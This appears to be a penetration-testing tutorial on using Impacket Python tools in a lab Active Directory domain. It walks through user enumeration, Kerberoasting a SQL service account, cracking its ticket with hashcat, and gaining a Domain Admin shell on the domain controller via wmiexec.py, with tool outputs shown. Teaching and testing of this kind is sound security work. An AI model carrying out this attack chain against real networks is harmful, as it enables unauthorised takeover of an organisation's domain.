Python for network penetration testing: Hacking Windows domain controllers with impacket Python tools
Impacket is one of the most popular tools available for Network Penetration testing. This toolset is a great example of the power of python in network penetration testing. This article explains how Impacket can be used to perform some interesting network based attacks in an Active Directory environment.
What is impacket?
According to the official page of Impacket by SecureAuth, “Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself.
Packets can be constructed from scratch, as well as parsed from raw data, and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library”.
Impacket library comes with a collection of python scripts that are extremely useful in various different scenarios for security professionals. In this article, we will specifically explore some of the Impacket tools that are helpful in attacking Domain Controllers in Active Directory environments.
Learn Secure Coding
Learn Secure Coding
What Windows protocols and domain controllers can Impacket exploit?
As shown in the official web page of Impacket, the following protocols are featured in Impacket.
- Ethernet, Linux “Cooked” capture.
- IP, TCP, UDP, ICMP, IGMP, ARP.
- IPv4 and IPv6 Support.
- NMB and SMB1, SMB2 and SMB3 (high-level implementations).
- MSRPC version 5, over different transports: TCP, SMB/TCP, SMB/NetBIOS and HTTP.
- Plain, NTLM and Kerberos authentications, using password/hashes/tickets/keys.
- Portions/full implementation of the following MSRPC interfaces: EPM, DTYPES, LSAD, LSAT, NRPC, RRP, SAMR, SRVS, WKST, SCMR, DCOM, WMI
- Portions of TDS (MSSQL) and LDAP protocol implementations.
Protocols such as WMI and DCOM are extremely useful in lateral movement in an AD environment. In the next few sections of the article, let us discuss how Impacket can be used against Domain Controllers to abuse some of the protocols listed here.
Impacket can be downloaded from the official GitHub page of SecureAuthCorp and run using a python interpreter. According to the GitHub page, Python 2.6/2.7 and Python 3.7 the versions that are known to work.
In this case, we will set up Impackt using Docker on Kali Linux, which is running as a virtual machine.
Note: Docker must be installed before attempting to build the image.
First, clone the source code using git as shown in the following excerpt and navigate to the impacket directory.
$ cd impacket
ChangeLog Dockerfile examples impacket LICENSE MANIFEST.in README.md requirements.txt setup.py tests tox.ini$
As we can notice, there is a Dockerfile. Run the following command, to build the docker image using the Dockerfile available.
As we can notice, the image is named impacket and tagged latest. Following is the output of the preceding command.
Sending build context to Docker daemon 14.7MB
Step 1/12 : FROM python:2-alpine as compile
2-alpine: Pulling from library/python
aad63a933944: Pull complete
259d822268fb: Pull complete
10ba96d218d3: Pull complete
44ba9f6a4209: Pull complete
Status: Downloaded newer image for python:2-alpine
Step 2/12 : WORKDIR /opt
---> Running in 6fd58d64ac4a
Removing intermediate container 6fd58d64ac4a
[redacted for brevity]
Step 9/12 : FROM python:2-alpine
Step 10/12 : COPY --from=compile /opt/venv /opt/venv
Step 11/12 : ENV PATH="/opt/venv/bin:$PATH"
---> Running in 240721305da2
Removing intermediate container 240721305da2
Step 12/12 : ENTRYPOINT ["/bin/sh"]
---> Running in 053e56eb9132
Removing intermediate container 053e56eb9132
Successfully built 54731856b89eSuccessfully tagged impacket:latest
Once the image is built, we can verify if the image is successfully built using the following command.
REPOSITORY TAG IMAGE ID CREATED SIZE
impacket latest 54731856b89e About a minute ago 155MB$
After the image is built, impackt can be used by spinning up a new container. The following command can be used to spin up a new container and it gives a shell on the container by default.
On the container shell, we can type any impacket script name and hit tab for suggestions as shown in the following excerpt.
GetADUsers.py GetADUsers.pyc GetNPUsers.py GetNPUsers.pyc GetUserSPNs.py GetUserSPNs.pyc/ #
With this, the Impacket setup is complete and we are ready to use it.
Attacking AD Environments using Impacket:
Assuming that we have already gained foothold in the network with low privileged domain user credentials, let us understand how we can use some of the scripts from Impacket to perform attacks against Active Directory environments.
Following is the environment we are using to demonstrate the concepts.
Domain FQDN: ADLAB.local
Low privileged user credentials: bob:p@ssw0rDAttacking machine: Kali Linux (Impacket running using Docker within Kali Linux)
AD User Enumeration:
Enumerating Active Directory users, groups, computers and their relationships is a crucial step in attacking AD environments. Let us use the script GetADUsers.py to dump the full list of users available in the target domain. The following command can be used to retrieve AD users.
Since our attacking machine is not part of the domain, we will need to explicitly specify the domain controller IP address using -dc-ip flag as shown in the preceding command.
This command however will not return any users as an email id filter is used in the script by default and there are no email ids available in our target environment. This can be seen by runnin the preceding command with the option -debug.
This command will return an empty user list with the details of the filter used as follows.
To override this default behaviour we can use -all flag and it will return all the users available in the domain. The command looks as follows.
The output looks as follows.
-------------------- ------------ ------------------- -------------------
[+] Search Filter=(&(sAMAccountName=*)(objectCategory=user))
Administrator 2020-10-27 03:05:53.839096 <redacted>
Guest <never> <never>
krbtgt 2020-10-27 03:15:54.552696 <never>
bob 2020-10-27 03:21:17.773021 <redacted>
tom 2020-10-27 03:24:08.129552 <never>
admin 2020-10-27 03:25:06.129524 <never>
sqlservice 2020-12-15 14:49:04.366695 <redacted>/ #
Since this is a lab setup, there are very few records setup. In a real environment, this list will be much longer. Additionally, we can also notice that the filter used this time is (&(sAMAccountName=*)(objectCategory=user)).
Using python for Privilege Escalation:
Now, let us use another python script available in Impacket library to elevate our privileges from domain user to a domain administrator. To achieve this, we are going to use a technique called Kerberoasting, which will be explained shortly. Note that the success of this attack relies on a few other factors, which we will discuss shortly.
First, let us identify all the accounts in the domain with Service Principal Name (SPN) set. This can be done using the following command.
Running this command shows the list of service accounts as follows.
---------------------------------- ---------- -------------------------------------------DC2019/sqlservice.ADLAB.local:1434 sqlservice CN=Domain Admins,CN=Users,DC=ADLAB,DC=local
As we can notice, we got a service account named sqlservice.
What is Kerberoasting?
In an Active Directory domain environment, any authenticated domain user without administrative privileges can request service tickets (TGS) for service accounts by specifying their SPN values. In response to this request, Active Directory will return a ticket, which is encrypted using the NTLM hash of the account associated with that SPN. Once the ticket is obtained, offline cracking can be performed using tools like Hashcat to recover the service account password in plain text. If the cracked service accounts are misconfigured to have unlimited privileges such as Domain Administrator, an attacker can become a Domain Admin just by compromising these service accounts. Let us see an example of how this can be achieved using impacket’s GetUsersSPNs.py.
Requesting a TGS:
The following command can be used to request a TGS for the service account sqlservice.
The output contains an encrypted ticket which looks as follows.
We can copy this into a file named hashes.txt and run hashcat against it using a wordlist as shown below.
hashcat (v6.0.0) starting...
[REDACTED FOR BREVITRY]
[REDACTED FOR BREVITY]$
As we can notice in the preceding excerpt, the service account password is cracked.
Gaining shell as a Domain Administrator:
As a next step, one can use Impacket’s wmiexec.py to gain shell access on the Domain Controller remotely. To do this, the following command can be used.
As we can notice, we are using the service account credentials that we compromised earlier. If successful, we should see a remote shell on the Domain Controller as shown in the following excerpt.
Impacket v0.9.23.dev1+20201209.133255.ac30770 - Copyright 2020 SecureAuth Corporation
[+] Impacket Library Installation Path: /opt/venv/lib/python2.7/site-packages/impacket
[*] SMBv3.0 dialect used
[+] Target system is 192.168.235.134 and isFDQN is False
[+] StringBinding: \\\\DC2019[\\PIPE\\atsvc]
[+] StringBinding: DC2019
[+] StringBinding: 192.168.235.134
[+] StringBinding chosen: ncacn_ip_tcp:192.168.235.134
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commandsC:\>
We can verify our privileges using the following commands.
C:\>net user sqlservice
User name sqlservice
Full Name SQLService
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 12/15/2020 6:49:04 AM
Password expires Never
Password changeable 12/16/2020 6:49:04 AM
Password required Yes
User may change password Yes
Workstations allowed All
Last logon 12/15/2020 7:26:16 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Admins *Domain Users
The command completed successfully.C:\>
As we can observe in the preceding excerpt, we have logged into the Domain Controller using Domain Admin rights.
Learn Secure Coding
Learn Secure Coding
In this article, we discussed how powerful python is to perform network penetration testing. To avoid reinventing the wheel by writing our own script, we made use of a powerful framework called Impacket to demonstrate the power of Python for network penetration testing. Clearly, Python can be used to create almost any popular network protocol as demonstrated in Impacket.